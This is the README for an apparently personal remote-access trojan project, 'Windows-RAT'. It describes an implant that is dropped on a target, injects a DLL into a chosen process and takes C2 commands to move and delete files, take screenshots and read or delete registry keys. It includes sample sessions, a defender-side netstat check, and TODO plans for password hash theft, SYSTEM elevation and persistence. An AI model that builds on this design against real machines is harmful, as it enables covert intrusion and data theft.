# Windows-RAT

This repository will serve as an exploratory environment where I will rely primarily on C++ and Windows APIs to delve into the deeper aspects of Windows security management along with the varying components and architectures that come within the Windows environment.

## Table of Contents
- Repository Breakdown
- Assumptions
- Testing Environment
- Build Environment
- Setup & Initial Comms (In progress)
- Examples
- TODO
## Repository Breakdown
- Packet captures between C2 and implant in a test environment for different commands. These help reinforce how the interaction between our C2 and implant works for each command type.
- All cpp implant side code that will, upon executing, open up a port on target and listen for commands sent by the user via the Python CLI.
- All py client side code that will, upon executing, open up a port on the client and send commands to the implant based on user input in the CLI.
- All cpp implant side code that will, upon executing, survey the target prior to loading our DLL, which implements our functionality and opens communications back to the client to accept commands.
## Assumptions
Current assumptions include:
- The user has access to the target machine + network
- The user has the ability to drop, or already has dropped, the .exe and .dll on target
- The user has remote shell/execution capabilities to launch the payload on target
- Traditional antivirus programs have been disabled/mitigated
- Target machine is Windows 10 Education version 10.0.19043 build 19043
- Python version for client is 3.7.16 (important for scapy use)
- Visual Studio 2022 version 17.11.3
## Setup & Initial Comms (In progress)
The setup of this tool comprises several steps which are important to understand in order to employ it properly:
- User drops executable to target and runs it
- Executable opens a port and waits for initial C2 connection
- C2 connects, sends filepath to write our DLL to
- C2 sends DLL file bytes
- Implant writes DLL to filepath
- Implant parses processes running on target to collect those that are inject-able; sends back to C2
- C2 allows user to choose which process to inject into; sends back to implant; closes connection
- Implant injects DLL into target process; shuts down
- DLL opens new port in target process; waits for C2 to connect
- C2 connects; starts issuing commands
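The flow above leaves two observable artifacts on the target: the dropped exe listening for its first connection, and, after injection, a new listening port owned by an ordinary user process. The following defender-side check is an added example (not part of this project): it parses `netstat -ano` style output, maps each TCP listener to its owning image, and flags owners that are not normal network servers. The netstat sample, the PID-to-image map, the choice of Explorer.EXE as the injected host and the allowlist are all constructed assumptions.

```python
import re

# Constructed sample of `netstat -ano` output on a test host. Port 1550 is the port
# the CLI in this README connects to; the Explorer.EXE listener stands in for the port
# the injected DLL opens inside its host process (host process assumed, not from the page).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1550           0.0.0.0:0              LISTENING       1348
  TCP    0.0.0.0:1551           0.0.0.0:0              LISTENING       4252
  TCP    192.168.111.128:1550   192.168.111.1:50234    ESTABLISHED     1348
  UDP    0.0.0.0:5353           *:*                                    1692
"""

# Constructed PID -> image name map (in practice taken from `tasklist` or Get-Process).
PROCESSES = {4: "System", 900: "svchost.exe", 1348: "RAT-Exe.exe",
             4252: "Explorer.EXE", 1692: "vmtoolsd.exe"}

# Images expected to own TCP listeners on a workstation; an assumption to tune per baseline.
EXPECTED_LISTENERS = {"System", "svchost.exe", "lsass.exe", "wininit.exe", "services.exe"}

LISTEN_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def listening_sockets(netstat_text):
    """Return (local_port, pid) for every TCP LISTENING row; all other rows are ignored."""
    result = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            result.append((int(m.group(1)), int(m.group(2))))
    return result


def unexpected_listeners(netstat_text, processes, expected=EXPECTED_LISTENERS):
    """Flag listeners whose owning image is unknown or not an expected server image.

    This surfaces both stages of the setup above: the dropped exe waiting for its first
    connection, and the injected DLL's new port inside an ordinary user process."""
    flagged = []
    for port, pid in listening_sockets(netstat_text):
        image = processes.get(pid, "<unknown>")
        if image not in expected:
            flagged.append((port, pid, image))
    return flagged


if __name__ == "__main__":
    for port, pid, image in unexpected_listeners(NETSTAT_SAMPLE, PROCESSES):
        print(f"port {port} is owned by {image} (PID {pid}); not an expected listener")
```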
## Examples
Required params:
- ip - IP address of target
- port - port number our implant is listening on
Optional params:
- N/A

```
pjsacchet@Patrick-Desktop:/mnt/c/Users/Admin/Projects/Personal/Windows-RAT/RAT-Py$ python3 RAT_Py_Main.py -ip 192.168.111.128 -port 1550
Reaching out to agent for connection establishment...
Connected to agent at 192.168.111.128 on port 1550
Please select from the following options:
putfile - Write a file to a location on target
getfile - Get a file from a specific location on target
dirlist - Perform a dir list for a particular directory on target
deletefile - Perform a delete file off target
screenshot - Take a screenshot of target (will get file and delete file off target)
regread - Read a registry key off target
regdelete - Delete a registry key/value off target
processlist - List all running processes off target
exit - Task agent to shutdown gracefully and cleanup
```
### putfile
Required params:
- filepath - Path (locally) to the file whose contents we are writing to target
- outfilepath - Remote file path where we want to write our file contents to
Optional params:
- overwrite - Whether or not to overwrite the file if it already exists (default is false)

```
> putfile
Required params:
-filepath - local path to file we are writing
-outputfilepath - remote path we are writing to
Optional params:
-overwrite - overwrite the file if it already exists (default: false)
> -filepath /mnt/c/Users/Admin/Projects/Personal/test.txt -outputfilepath C:\test2.txt
Sending command...
Sending file path...
Sending file contents...
Sending overwrite...
Sent data to implant; waiting on response code...
Successful file put!
```
### getfile
Required params:
- filepath - File path on target to the file we want to get
- outfilepath - Local file path where we want to write our file contents to
Optional params:
- overwrite - Whether or not to overwrite the file locally if it already exists (default is false)

```
> getfile
Required params:
-filepath - path to file on target
-outfilepath - file to write to locally
Optional params:
- overwrite - overwrite the file locally if it already exists
> -filepath C:\test.txt -outfilepath /mnt/c/Users/Admin/Projects/Personal/Windows-RAT/TestFiles/test.txt
Successful file get! Getting file contents...
Successfully wrote file contents to /mnt/c/Users/Admin/Projects/Personal/Windows-RAT/TestFiles/test.txt
```
### dirlist
Required params:
- path - path to the directory we would like to list off target
Optional params:
- N/A

```
> dirlist
Required params:
-path - path to directory we're listing off target
> -path C:\Users\Admin\Documents
Sending command...
Sending dir path...
Files in C:\Users\Admin\Documents:
.
..
Debugger-Command.txt
desktop.ini
Internals-DLL.dll
Internals-Exe.exe
My Music
My Pictures
My Videos
RAT-Dll.dll
RAT-Exe.exe
Successful dir list!
```
### deletefile
Required params:
- filepath - path to the file we're deleting off target
Optional params:
- N/A

```
> deletefile
Required params:
-filepath - path to the file we're deleting off target
> -filepath C:\test2.txt
Sending command...
Sending file path...
Successful delete file!
```
### screenshot
Required params:
- filepath - path where we would like to write our screenshot to locally
Optional params:
- N/A

```
> screenshot
Required params:
-filepath - Path where we would like to write our screenshot to locally
> -filepath /mnt/c/Screenshots/screenshot.bmp
Sending command...
Successful screenshot! Getting file size...
File is 14745654 bytes; Receiving data...
Successfully wrote file to disk... awaiting implant reponse code...
Successful screenshot!
```
### regread
Required params:
- keypath - path to the key we're reading off target
- value - name of the value we're reading from the key
Optional params:
- N/A

```
> regread
Required params:
-keypath - Path to the registry key we'd like to read
-value - Name of the value we want to read
> -keypath HKLM\SYSTEM\CurrentControlSet\Control -value CurrentUser
Sending command...
Sending key path...
Sending value name...
Successful reg read file! Getting key size...
Key data is 9 bytes; Receiving data...
Key HKLM\SYSTEM\CurrentControlSet\Control with value CurrentUser returned: USERNAME
```
### regdelete
Required params:
- keypath - path to the key/value we're deleting off target
- value - name of the value (or subkey) we're deleting off target
Optional params:
- iskey - whether the value passed is a subkey rather than a value

Deleting a value:

```
> regdelete
Required params:
-keypath - Path to the registry key/value we'd like to delete
-value - Name of the value we want to delete
Optional params:
-iskey - The value being passed is a subkey we're deleting, not a value
> -keypath HKLM\SOFTWARE\TestKey -value testvalue
Sending command...
Sending delete key... (0)
Sending key path...
Sending value/key name...
Successful reg delete!
```

Deleting a subkey:

```
> regdelete
Required params:
-keypath - Path to the registry key/value we'd like to delete
-value - Name of the value we want to delete
Optional params:
-iskey - The value being passed is a subkey we're deleting, not a value (default:false)
> -keypath HKLM\SOFTWARE -value TestKey -iskey
Sending command...
Sending delete key... (1)
Sending key path...
Sending value/key name...
Successful reg delete!
```
### processlist
Required params:
- N/A
Optional params:
- N/A

```
> processlist
Required params:
- N/A
Sending command...
Implant found 25 processes:
svchost.exe
PID: 4000
sihost.exe
PID: 5672
svchost.exe
PID: 5028
taskhostw.exe
PID: 6052
Explorer.EXE
PID: 4252
svchost.exe
PID: 4092
StartMenuExperienceHost.exe
PID: 5200
TextInputHost.exe
PID: 2240
RuntimeBroker.exe
PID: 3672
UserOOBEBroker.exe
PID: 6200
SearchApp.exe
PID: 6336
RuntimeBroker.exe
PID: 6572
SecurityHealthSystray.exe
PID: 3132
vmtoolsd.exe
PID: 1692
svchost.exe
PID: 8164
dbgview64.exe
PID: 7700
RuntimeBroker.exe
PID: 7564
cmd.exe
PID: 7028
conhost.exe
PID: 5576
cmd.exe
PID: 6124
conhost.exe
PID: 900
DllHost.exe
PID: 1040
ApplicationFrameHost.exe
PID: 336
PhoneExperienceHost.exe
PID: 7040
RAT-Exe.exe
PID: 1348
Successful process list!
```
## TODO
- Flesh out getfile functionality
  - Eventually add flags for offsets into file and chunk sizes to send back to C2?
  - Should send back file size first, then the full file contents... currently only takes 1024 bytes
- Flesh out putfile functionality
  - Implement C2 OK messages to ensure it has the param, or resend if need be
- Flesh out dirlist functionality
  - Implement recursive dir lists + additional file info
- Flesh out deletefile functionality
  - Return number of bytes we successfully deleted?
- Flesh out screenshot functionality
  - Refactor; add output param for file buffer contents and send our data back in the caller, not the callee
- Flesh out registry functionality
  - Handle different reg data types
    - Should send back data type as a separate return from implant and handle as needed in the Python scripting
- Flesh out process list functionality
  - Swap out success variable for ERROR_SUCCESS
- Implement registry key write add/delete
- Add registry key value listing/add/delete
- Implement get system info
- Implement password hash stealing via registry reads
- Enable SYSTEM elevation
- Have exe inject our dll into some other process's memory
  - Or simply call system API with dll - rundll or something similar
- Process query
  - Return specific info about a particular process
- Driver list
  - Return specific info about a particular driver
  - List all loaded drivers
- Start/stop processes?
  - Flags for permissions, process name etc.
- User list
  - Get logged on users, all users
  - Can do this via registry... or other way?
- Have exe perform survey, report results back to C2 and have C2 send DLL payload for loading
  - Have exe survey running processes; inject DLL into target after running
  - Survey, report back to C2 those that we can inject, then get payload and start it; maybe self kill?
- Whoami-esque command
- Implement basic encryption?
  - Give both implant and C2 the same key or something for packet encryption
- Add specific error messages and a translate function for easy debug messages
- Currently only support ASCII... could do unicode pretty easily?
- Persistence via registry or something?
- Add basic quit / cleanup
  - Self cleanup off disk?
- Add random GUID
- Exe does not exit 'cleanly'
  - Even if exe exits we do not alert our C2, so it still thinks it's connected
- Put file
  - Large files may fail due to socket streams mixing command values